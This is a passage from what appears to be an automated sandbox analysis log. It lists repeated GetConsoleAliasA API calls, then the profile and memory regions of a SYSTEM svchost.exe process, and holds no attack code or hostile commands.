ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.312] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.313] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.314] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.315] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa35b000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1382 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1383 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1384 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1385 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1386 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1387 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1388 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1389 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1390 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1391 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1392 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1393 start_va = 0x190000 end_va = 0x19afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1394 start_va = 0x1a0000 end_va = 0x1acfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1395 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 1396 start_va = 0x1c0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 1397 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1398 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1399 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1400 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1401 start_va = 0x3f0000 end_va = 0x3f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1402 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1403 start_va = 0x410000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1404 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1405 start_va = 0x450000 end_va = 0x45dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1406 start_va = 0x460000 end_va = 0x467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = 